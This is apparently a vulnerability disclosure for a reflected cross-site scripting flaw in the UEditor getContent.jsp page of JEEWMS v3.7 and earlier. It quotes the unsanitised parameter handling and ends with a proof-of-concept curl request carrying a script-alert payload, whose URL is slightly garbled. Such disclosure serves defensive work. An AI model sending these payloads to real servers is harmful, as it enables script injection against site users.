Reflected XSS Vulnerability has been identified in JEEWMS v3.7 which has the UEditor component, a third-party rich text editor, contains Reflected XSS vulnerability.
JEEWMS ≤ v3.7
Full Path: src/main/webapp/plug-in/ueditor/jsp/getContent.jsp
Relative to Webroot: /plug-in/ueditor/jsp/getContent.jsp
Access URL: http://[target]:[port]/jeewms/plug-in/ueditor/jsp/getContent.jsp
// Line 12
String content = request.getParameter("myEditor");
// Line 17 - Direct output without sanitization!
response.getWriter().print("<div class='content'>"+content+"</div>");
Unvalidated Input Retrieval (Line 12)
String content = request.getParameter("myEditor");
The myEditor parameter is retrieved directly from the HTTP request
Unsafe Output to HTML (Line 17)
response.getWriter().print("<div class='content'>"+content+"</div>");
The output is rendered as HTML, allowing script injection
curl "<http://target:8080/jeewmplug-in/ueditor/jsp/getContent.jsp?myEditor=><script>alert('XSS')</script>"